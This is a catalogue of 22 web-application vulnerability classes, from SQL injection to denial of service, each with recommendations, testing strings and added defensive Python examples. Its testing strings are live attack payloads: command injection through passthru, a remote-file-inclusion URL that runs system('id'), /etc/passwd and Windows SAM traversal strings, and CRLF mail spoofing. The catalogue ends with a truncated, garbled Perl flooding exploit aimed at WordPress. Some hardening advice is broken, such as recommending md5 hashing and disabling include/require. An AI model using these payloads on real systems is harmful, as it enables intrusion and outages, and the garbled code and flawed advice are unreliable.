1.)SQL injection
a)Description
SQL injection allows an attacker to execute SQL commands on the database server behind the application he is attacking.
b)Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible not only to manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
e)Response
200 OK, database error messages, redirection to another page
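An added example, not part of the original post, showing the vulnerable string-built query next to the parameterized form, plus the a-zA-Z0-9 allowlist recommended above as a pre-check. The table and rows are constructed in memory; sqlite3 stands in for whatever database the application uses.

```python
import re
import sqlite3

ALNUM = re.compile(r"[a-zA-Z0-9]+\Z")


def make_db():
    """Constructed in-memory user table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "a-secret"), (2, "bob", "b-secret")])
    return db


def lookup_concat(db, name):
    """Vulnerable form: the user-supplied value is pasted into the SQL text,
    so quotes and operators inside it become part of the query."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_param(db, name):
    """Hardened form: the value travels as a bound parameter and is never parsed as SQL."""
    rows = db.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def lookup_allowlisted(db, name):
    """The page's own rule (a-zA-Z0-9 only) applied as an input pre-check on top of binding."""
    if not ALNUM.match(name):
        raise ValueError("rejected: characters outside a-zA-Z0-9")
    return lookup_param(db, name)


def probe_error(db, name):
    """Returns the database error class name the concatenating query raises for
    an input such as a lone quote, or None if the query ran; this is the
    'database error messages' response listed above."""
    try:
        lookup_concat(db, name)
        return None
    except sqlite3.Error as exc:
        return type(exc).__name__
```

The bound parameter is the real fix; the allowlist is defence in depth and only works for fields that genuinely never need other characters.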
2.)Cross Site Scripting (XSS)
a)Description
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
It is abbreviated XSS rather than CSS because CSS already means "Cascading Style Sheets".
b)Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.
c)Recommendation
Allow only a-zA-Z0-9 characters or, in PHP, pass the data through the htmlspecialchars() function.
d)Testing string/s
(), ([script]alert();[/script]), (), ()
e)Response
200 OK, a pop-up message showing your cookies
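An added example (not from the original post) of the htmlspecialchars() recommendation above, written in Python with html.escape as the equivalent: user data is encoded before it is placed in element text and in a double-quoted attribute, and the stricter a-zA-Z0-9 rule is shown as a separate check for fields that can afford it.

```python
import html
import re


def escape_html(value):
    """Equivalent of PHP's htmlspecialchars($value, ENT_QUOTES): & < > " and '
    become entities, so the browser renders them as text instead of markup."""
    return html.escape(value, quote=True)


def render_comment(author, text):
    """Builds a page fragment with user data in two contexts: inside a
    double-quoted attribute and as element text. Both go through escape_html."""
    return ('<div class="comment" data-author="%s"><b>%s</b>: %s</div>'
            % (escape_html(author), escape_html(author), escape_html(text)))


def is_alnum(value):
    """The page's stricter rule: accept only a-zA-Z0-9 (usable for usernames, ids)."""
    return re.fullmatch(r"[a-zA-Z0-9]+", value) is not None
```

Escaping is context-specific: this covers HTML text and quoted attribute values. Data placed inside a script block or a URL needs the encoding for that context instead.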
3.)Cross site request forgery (CSRF)
a)Description
Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice.
b)Impact
An attacker may put a link on a forum; when someone clicks it, the victim's browser sends a message to the forum server. This may cause a flood.
c)Recommendation
-Use POST instead of GET method
-Request authorization
-Check the Referer
-Every request has to be unique
d)Testing string/s
Subject:
Message:
This way the attacker floods the server and could bypass firewall protection, since the flooders are ordinary users who don't know what they are doing.
e)Response
200 OK, successful redirection
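An added example, not part of the original post, implementing the four recommendations above: a POST-only rule, a Referer check, and a per-form token that is unguessable and consumed on use so that every request is unique. The session dict and the hostname forum.example are assumptions for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "forum.example"  # assumed hostname of the protected site


def issue_csrf_token(session):
    """Generates an unguessable token, remembers it in the server-side session
    and returns it for embedding as a hidden form field. Each form gets its own."""
    token = secrets.token_urlsafe(32)
    session.setdefault("csrf_tokens", set()).add(token)
    return token


def referer_matches(referer, site_host=SITE_HOST):
    """Referer check: the request must come from one of our own pages.
    Browsers may omit the header, so a missing Referer is treated as a failure here."""
    if not referer:
        return False
    return urlsplit(referer).hostname == site_host


def check_csrf(session, method, referer, submitted_token, site_host=SITE_HOST):
    """Accepts a state-changing request only if it is a POST, the Referer is ours
    and the submitted token is one this session issued. The token is consumed,
    so the same request cannot be replayed."""
    if method != "POST":
        return False
    if not referer_matches(referer, site_host):
        return False
    tokens = session.get("csrf_tokens", set())
    submitted = (submitted_token or "").encode()
    for token in list(tokens):
        # constant-time comparison avoids leaking the token through timing
        if hmac.compare_digest(token.encode(), submitted):
            tokens.remove(token)
            return True
    return False
```

The token is the check that actually stops a forged request; the Referer test is a secondary signal because it is sometimes stripped by proxies and privacy settings.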
4.)PHP injection
a)Description
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server-side scripting engine. It occurs when an attacker can control all or part of an input string that is fed into an eval() function call; eval() executes its argument as code.
b)Impact
Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions.
c)Recommendation
Allow only a-zA-Z0-9 characters and set php.ini as follows:
engine = off
register_globals = off
magic_quotes_gpc = off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
session.use_trans_sid = off
session.use_only_cookies = 1
safe_mode = on
safe_mode_gid = Off
safe_mode_include_dir = Off
safe_mode_exec_dir = Off
allow_url_fopen = off
open_basedir = '/home/sheib/public_html/unsafe'   ; edit this
file_uploads = off
display_errors = off
log_errors = on
expose_php = off
error_reporting = E_ALL
session.save_path = "/tmp"   ; edit this if you want
post_max_size = 8M
disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require, require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec, Limits
*addslashes/stripslashes/magic_quotes_gpc won't help much
*Read request data from $_GET/$_POST and keep authentication state in $_SESSION instead of relying on register_globals
*Don't rely on encoding functions like urlencode or base64_encode as if they were encryption; use md5 hashing
d)Testing string/s
(), (system(base64_decode(YWRtaW4=) #admin), ('.passthru($_GET[cmd]).'&cmd=id), (phpinfo()
e)Response
200 OK, test, admin, uid...
5.)PERL injection
a)Description
Perl injection works the same way as PHP injection; the difference is that the injected code is Perl rather than PHP.
b)Impact
Malicious users may inject Perl code which will be executed on the server side.
c)Recommendation
Allow only a-zA-Z0-9 characters and use no warnings;
d)Testing string/s
(perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\)
e)Response
200 OK, Windows IP Configuration, foo
6.)Path disclosure
a)Description
The application returns an error message that discloses the installation path and other data.
b)Impact
A remote user can determine the full path to the web root directory and other potentially sensitive information.
c)Recommendation
Allow only a-zA-Z0-9 characters and turn off error messages; how depends on the script.
d)References
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
e)Testing string/s
(/), (\)
f)Response
200 OK, Warning message
7.)ASP injection
a)Description
ASP injection works the same way as PHP or Perl injection; the difference is that the injected code is ASP rather than PHP/Perl.
*Note*
ASP injection is possible only on Windows machines running IIS
b)Impact
Malicious users may inject ASP code which will be executed on the server side.
c)Recommendation
Allow only a-zA-Z0-9 characters and disable the following procedures:
sp_makewebtask
xp_startmail
xp_sendmail
xp_cmdshell
xp_regwrite
d)Testing string/s
(<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;)
e)Response
200 OK, Test
8.)Source code disclosure
a)Description
It is possible to read the source code of a script by passing the script's own filename as a parameter. The script appears to include a file whose name is derived from user-supplied data, and that data is not properly validated before being passed to the include function.
b)Impact
An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.
c)Recommendation
Analyse the source code of this script and fix the problem.
d)References
http://www.imperva.com/application_defense...disclosure.html -> "Source Code Disclosure" by Imperva
e)Testing string/s
request the file itself
f)Response
200 OK,
8.)Server side includes (SSI)
a)Description
Server Side Includes (SSI) is a simple server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of one file in another, via a web server.
SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote could be included into multiple SSI-enabled pages throughout a website by placing an SSI include directive into the desired pages. With one change of the quote.txt file, every page including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu.
In order for a web server to recognise an SSI-enabled HTML file and carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm, but this depends on the server's ability to recognise the extension.
b)Impact
An attacker can execute commands on the server.
c)Recommendation
Turn off SSI.
d)References
http://en.wikipedia.org/wiki/Server_Side_Includes -> "Server Side Includes" by Wikipedia
e)Testing string/s
f)Response
200 OK, root, uid....
9.)Code execution
a)Description
Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.
b)Impact
A malicious user may execute arbitrary system commands with the permissions of the web server.
c)Recommendation
*Allow only a-zA-Z0-9 characters
*Turn on safe_mode
*Disable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec
*Set permissions so that only root can execute commands
*Use escapeshellcmd or escapeshellarg
d)References
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp
e)Testing string/s
(|id|), ($(id)), (; id), (| id), (&& id) (|| id), (> id), (<>
f)Response
200 OK, uid...
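An added example (not from the original post) of the escapeshellarg recommendation and the a-zA-Z0-9 rule, in Python: the preferred fix is to hand the command an argument vector with no shell at all, and where a shell string is unavoidable, to quote the value so the separators listed in the testing strings above become ordinary characters. The child process is a Python one-liner so the example runs anywhere without depending on a particular system tool.

```python
import re
import shlex
import subprocess
import sys


def is_alnum(value):
    """The page's allowlist: a-zA-Z0-9 only, so no shell metacharacter can get through."""
    return re.fullmatch(r"[a-zA-Z0-9]+", value) is not None


def argv_for(tool, user_value):
    """Preferred form: an argument vector. With shell=False nothing parses it,
    so ; | && $( ) inside user_value stay inside that one argument."""
    return [tool, user_value]


def shell_string_for(tool, user_value):
    """If a shell command line is unavoidable, quote the value the way PHP's
    escapeshellarg() does, so the shell sees one literal word."""
    return tool + " " + shlex.quote(user_value)


def echo_via_child(user_value):
    """Round-trips the value through a child process as a single argv element.
    Whatever metacharacters it holds come back unchanged because no shell
    ever interpreted them."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_value],
        capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")
```

Quoting protects the shell parse only; it does not stop the called program from misusing an argument (for example a value that starts with a dash being read as an option), which is why the allowlist is still worth keeping for simple fields.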
10.File inclusion
a)Description
An attacker can include a remote or local file and execute commands on the server.
b)Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.
c)Recommendation
*allow_url_fopen = off
*Use the file_exists() function to check that the file is valid
*Don't let the user control which file is included
d)References
http://www.php.net/manual/en/features.remote-files.php -> "Using remote files"
http://www.theserverpages.com/10101/21/ -> "Code Injection Vulnerabilities Explained" by The Server Pages
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp
e)Testing string/s
(http://site.domain/include/test.php), (/file.php)
Where test.php contains:
$t=system('id');
echo "$t";
?>
f)Response
200 OK, uid....
11.)Directory Traversal
a)Description
Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.
b)Impact
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.
c)Recommendation
*Allow only a-zA-Z0-9 characters
*Set open_basedir
*Set display_errors to off
d)References
http://www.acunetix.com/websitesecurity/di...y-traversal.htm -> "Directory Traversal Attacks" by Acunetix
http://bg.php.net/features.safe-mode -> "Security and Safe Mode"
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://en.wikipedia.org/wiki/Directory_traversal -> "Directory traversal" by Wikipedia
http://www.imperva.com/application_defense..._traversal.html -> "Directory Traversal" by Imperva
http://cert.uni-stuttgart.de/archive/vulnw...2/msg00007.html -> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski
e)Testing string/s
(../) (../../../../../../../../etc/passwd)
f)Response
200 OK, directory listing, root
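An added example, not part of the original post, covering both the file inclusion (section 10) and directory traversal (section 11) recommendations: a user-supplied include name is fully percent-decoded (so the double-encoded %252e and %252f forms that appear in the CGI testing strings later on are judged on what they decode to), remote URLs and absolute paths are refused, and the normalised path must stay inside an assumed include directory. The directory name is a placeholder.

```python
import posixpath
from urllib.parse import unquote

INCLUDE_DIR = "/var/www/app/includes"  # assumed directory the application may include from


def fully_decode(raw):
    """Undoes repeated percent-encoding (%252e -> %2e -> .) so that double-encoded
    traversal sequences are judged on what they decode to."""
    current = raw
    for _ in range(5):
        decoded = unquote(current)
        if decoded == current:
            return decoded
        current = decoded
    return current


def resolve_include(raw, base_dir=INCLUDE_DIR):
    """Returns the absolute path to include, or None when the request must be refused.
    This is a lexical check: refuse remote URLs, absolute paths, and anything whose
    normalised form leaves base_dir. A real deployment should additionally realpath()
    the result so symlinks cannot point outside base_dir."""
    name = fully_decode(raw).replace("\\", "/")
    if not name:
        return None
    if "://" in name or name.startswith("//"):
        return None                      # remote file (what allow_url_fopen = off also blocks)
    if name.startswith("/"):
        return None                      # absolute path outside our tree
    if "\x00" in name:
        return None                      # a NUL would truncate the name in C-based runtimes
    full = posixpath.normpath(posixpath.join(base_dir, name))
    if full != base_dir and not full.startswith(base_dir + "/"):
        return None                      # ../ climbed out of base_dir
    return full
```

An allowlist of the handful of filenames the application actually includes is simpler and stronger than any path check; the check above is for cases where the name really must come from the request.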
12.)Cross Frame scripting (XFS)
a)Description
This is an attack technique used to trick a user into thinking that fake web site content is legitimate data.
b)Impact
Malicious users may poison a frame allowing them to conduct phishing attacks.
c)Recommendation
Allow only a-zA-Z0-9 characters and verify the data sent by the user
d)References
http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf -> "The Phishing Guide" by Gunter Ollmann
e)Testing string/s
http://your-page.com/grab_data.php
f)Response
200 OK, http://your-page.com/grab_data.php
13.)CGI security checks
a)Description
CGI security checks test whether the site's Common Gateway Interface scripts are vulnerable to old or new bugs.
b)Impact
Malicious users may execute commands or do something else, depending on the bug.
c)Recommendation
Keep your server and software updated.
d)References
http://www.w3.org/Security/faq/wwwsf4.html -> "CGI script security" by Lincoln D. Stein and John N. Stewart
http://www.mirrors.wiretapped.net/security...ng/safe-cgi.txt -> "Safe CGI Programming" by Paul Phillips
http://bau2.uibk.ac.at/matic/cgi2.htm -> "CGI security holes" by Jennifer Myers
e)Testing string/s
/.%252e/.%252e/.%252e/winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
f)Response
200 OK
14.)Cookie attacks
a)Description
By injecting a custom HTTP header or a META tag it is possible to alter the cookies stored in the browser. Attackers normally manipulate cookie values to fraudulently authenticate themselves on a web site.
b)Impact
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.
c)Recommendation
You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
Additionally, with each login the application should provide a new session ID to the user.
d)References
http://www.acros.si/papers/session_fixation.pdf -> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek
http://www.webappsec.org/projects/threat/c..._fixation.shtml -> "Session Fixation" by Web Application Security Consortium
http://www.php.net/session -> "Session Handling Functions"
http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf -> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein
http://www.securityfocus.com/infocus/1722 -> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm
e)Testing string/s
(Set-Cookie: cookiename=cookievalue) ()
f)Response
200 OK, new cookie that contains your data
15.)Http response splitting/CRLF injection
a)Description
HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
b)Impact
It is possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may lead to vulnerabilities such as XSS (cross-site scripting) or session fixation.
c)Recommendation
You need to strip CR (ASCII 13, \r) and LF (ASCII 10, \n) from the user input, or properly encode the output, in order to prevent the injection of custom HTTP headers.
d)References
http://www.acunetix.com/websitesecurity/crlf-injection.htm -> "CRLF Injection Attack" by Acunetix
http://www.cgisecurity.com/lib/crlf-injection.txt -> "CRLF Injection" by Ulf Harnhammar
http://packetstormsecurity.org/papers/gene...ttpresponse.pdf -> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html -> "Introduction to HTTP Response Splitting" by dcrab
http://www.cgisecurity.com/papers/header-b...xploitation.txt -> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity
http://www.cgisecurity.com/lib/bill/Willia...llamy_GCIH.html -> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr.
e)Testing string/s
http://localhost/mail.php?from=foo@foo.com...;message=moofoo
Where our headers will look like:
CC: foo@foo.com
Bcc: foo@foo.com
If we change our URL to
http://localhost/mail.php?from=foo@foo.com&to=mail1, mail2, mail3\r\n&subject=foo&message=moofoo
we have just done a mail spoofing attack.
f)Response
200 OK, changed headers, redirection to another page
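An added example, not from the original post, of the CR/LF recommendation applied to the mail.php pattern above and to an HTTP Location header. Any value carrying a CR (0x0D) or LF (0x0A) byte is refused before it is placed after "Key: ", addresses must match a strict shape, and a small counter shows how an unchecked Location turns one response into two. The address regex is an assumption for the demonstration, not a full RFC 5322 check.

```python
import re

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\Z")
RESPONSE_START = re.compile(r"(?:^|\r\n)HTTP/1\.[01] \d{3}")


def header_value(value):
    """A header value must be a single line: CR or LF anywhere in it would
    start a new header, so the value is refused outright."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in a header value")
    return value


def build_mail_headers(sender, recipient, subject):
    """Hardened version of the mail.php pattern: addresses must match a strict
    shape (which also rules out a 'mail1, mail2, mail3' list), and every
    value is line-checked before it is placed after 'Key: '."""
    for addr in (sender, recipient):
        if not EMAIL.match(addr):
            raise ValueError("bad address: %r" % addr)
    lines = ["From: " + header_value(sender),
             "To: " + header_value(recipient),
             "Subject: " + header_value(subject)]
    return "\r\n".join(lines) + "\r\n\r\n"


def naive_redirect(location):
    """Vulnerable form kept for contrast: the value goes into Location unchecked."""
    return "HTTP/1.1 302 Found\r\nLocation: " + location + "\r\n\r\n"


def safe_redirect(location):
    return "HTTP/1.1 302 Found\r\nLocation: " + header_value(location) + "\r\n\r\n"


def count_responses(stream):
    """How many HTTP responses a proxy or browser would see in this byte stream."""
    return len(RESPONSE_START.findall(stream))
```

Refusing the value (rather than silently deleting the two bytes) is the safer default, because it also surfaces the attempt in the application's logs.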
16.)Buffer overflow
a)Description
Today it is almost impossible to find a buffer overflow in a web application, but there are still some scripts that embed C/C++/C# code.
b)Impact
An attacker could execute commands on the server and even get root privileges
c)Recommendation
Analyse the source code of your C/C++/C# program and fix all possible overflows.
*For Microsoft Visual C++ .NET you can compile with /GS (Buffer Security Check) to catch possible overflows, and with /Gs (Control Stack Checking Calls), but be careful when using /Gs.
d)References
http://www.whitehatsec.com/articles/mythbu...er_overflow.pdf -> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman
http://en.wikipedia.org/wiki/Buffer_overflow -> "Buffer overflow" by Wikipedia
e)Testing string/s
http://webserver/foo.cgi?param1=AAAAAAAAAAAAAAAAA... 5000 A's
f)Response
500 Internal Server Error, 0x41414141 or something similar
17.)Format String
a)Description
Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf().
b)Impact
A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .
c)Recommendation
Analyse the source code of your C/C++/C# program and fix all possible overflows.
d)References
http://www.webappsec.org/projects/threat/c...ng_attack.shtml -> "Format String Attack" by Web Application Security Consortium
http://en.wikipedia.org/wiki/Format_string_attack -> "Format string attack" by Wikipedia
e)Testing string/s
(%f), (%p), (%n)
http://server/foo.cgi?param1=AAAA%x%x%x%x%x%x%x%x
f)Response
Error message, something like 0x0804960c and so on...
18.)Integer Overflow
a)Description
In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful code.
b)Impact
A malicious user may create a buffer overflow condition and execute commands on the server
c)Recommendation
Analyse the source code of your C/C++/C# program and fix all possible overflows.
d)References
http://www.phrack.org/phrack/60/p60-0x0a.txt -> "Basic Integer Overflows" by blexim
http://en.wikipedia.org/wiki/Integer_overflow -> "Integer overflow" by Wikipedia
e)Testing string/s
http://server/foo.cgi?param1=35 65535
f)Response
Error message, something like 0x0000ffff and so on...
19.)LDAP Injection
a)Description
Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement.
b)Impact
When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)References
http://en.wikipedia.org/wiki/LDAP -> "Lightweight Directory Access Protocol" by Wikipedia
http://www.webappsec.org/projects/threat/c...injection.shtml -> "LDAP Injection" by Web Application Security Consortium
http://www.spidynamics.com/whitepapers/LDAPinjection.pdf -> "LDAP Injection" by Sacha Faust
http://www.ietf.org/rfc/rfc1960.txt -> "A String Representation of LDAP Search Filters" by Tim Howes
http://ldapman.org/ -> LDAP resources
e)Testing string/s
()), (*)
f)Response
Redirection, error message containing information
20.)XPath Injection
a)Description
This script is possibly vulnerable to XPath Injection attacks. XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
b)Impact
An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)References
http://palisade.paladion.net/issues/2005Jul/xpath-injection/ -> "XPath injection in XML databases" by Runa Dwibedi
http://www.webappsec.org/projects/threat/c...injection.shtml -> "XPath Injection" by Web Application Security Consortium
http://www.w3.org/TR/xpath -> "XML Path Language (XPath)" by W3C
http://arxiv.org/PS_cache/cs/pdf/0210/0210026.pdf -> "Encoding a Taxonomy of Web Attacks with Different-Length Vectors" by Gonzalo Alvarez and Slobodan Petrovic
http://packetstormsecurity.org/papers/bypa...on_20040518.pdf -> "Blind Xpath Injection" by Amit Klein
e)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
f)Response
Full content of XML document
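An added example, not part of the original post, for sections 19 and 20 together: the value-escaping that lets user data sit inside an LDAP search filter (the escape set from RFC 4515, the successor of the RFC 1960 filter syntax cited above) and inside an XPath 1.0 string literal, each next to the unescaped form for contrast. The filter and query shapes are assumptions.

```python
def escape_ldap_filter_value(value):
    """Escapes a value for use inside an LDAP search filter: backslash, *, ( )
    and NUL become \\XX hex escapes, so the value can no longer change the
    filter's structure or widen a match with a wildcard."""
    out = []
    for ch in value:
        if ch in "\\*()\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def ldap_user_filter(uid):
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(uid)


def ldap_user_filter_vulnerable(uid):
    """Kept for contrast: a '*' or ')(' in uid rewrites the filter."""
    return "(&(objectClass=person)(uid=%s))" % uid


def xpath_string_literal(value):
    """Turns any string into an XPath 1.0 string literal. A value containing
    one kind of quote is wrapped in the other; one containing both is split
    with concat(), so a quote in user data can never close the literal."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    pieces = ["'%s'" % part for part in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"


def xpath_user_query(username):
    return "//user[name=%s]" % xpath_string_literal(username)
```

Distinguished names (DNs) use a different escaping rule (RFC 4514) from filter values; the function above is for filters only. Where the XPath or LDAP library offers variable binding, prefer that over string building.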
21.)URL redirection
a)Description
This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.
b)Impact
A remote attacker can redirect users from your website to a URL of his choosing. This may help an attacker conduct phishing attacks, distribute trojans or send spam.
c)Recommendation
Your script should properly sanitize user input.
d)References
http://www.nist.org/news.php?extend.147 -> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY
e)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
f)Response
200 OK, redirection to another page
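An added example, not from the original post, of what "properly sanitize user input" means for a redirect parameter: only a site-relative path or an absolute http(s) URL on exactly our own host is accepted, everything else falls back to a default page. The hostname www.example.com is an assumption.

```python
from urllib.parse import urlsplit

SITE_HOST = "www.example.com"   # assumed hostname of the site issuing redirects


def safe_redirect_target(target, site_host=SITE_HOST, default="/"):
    """Returns a redirect destination that stays on our site. Allowed: a
    site-relative path, or an absolute http(s) URL whose host is exactly ours.
    Everything else (other hosts, protocol-relative //host, javascript:, a
    userinfo trick like https://ours@evil) falls back to `default`."""
    if not target:
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        if parts.scheme in ("http", "https") and parts.hostname == site_host:
            return target
        return default
    # no scheme/netloc: must be a plain site-relative path, not //host or /\host
    if not target.startswith("/") or target.startswith("//") or target.startswith("/\\"):
        return default
    return target
```

Comparing the parsed hostname, rather than checking that the string starts with or contains the site name, is what defeats the www.example.com.evil.example and userinfo variants.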
22.)Web Application DoS
a)Description
Web application DoS (Denial of Service) is an attack that sends multiple requests of very large size to a server.
b)Impact
Computer crash, service crash, SQL crash
c)Recommendation
Preventing web application DoS (and DoS in general) isn't that hard, but protecting against DDoS (Distributed Denial of Service) is impossible. Anyway, here are some tips:
*Use POST instead of GET
*Make a function that stops multiple POST/GET requests to your site from the same user. If the user makes the request 3-4 times, block his IP from requesting anything on your site for 5-10 minutes and log the IP
*POST requests should not be larger than 8 MB
*When you specify a maximum size, add a check function so that the attacker cannot exceed it
d)References
http://en.wikipedia.org/wiki/Denial-of-service_attack -> "Denial-of-service attack" by Wikipedia
http://www.cert.org/tech_tips/denial_of_service.html -> "Denial of Service Attacks" by CERT
http://cnscenter.future.co.kr/resource/sec...DoS_attacks.pdf -> "Application Denial of Service (DOS) Attacks" by Stephen de Vries
http://www.lasr.cs.ucla.edu/ddos/404_mirkovic_j.pdf -> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher
e)Testing string/s
Here is my wordpress crash exploit:
#!perl
#Greets ot all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV <>
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999;>
{
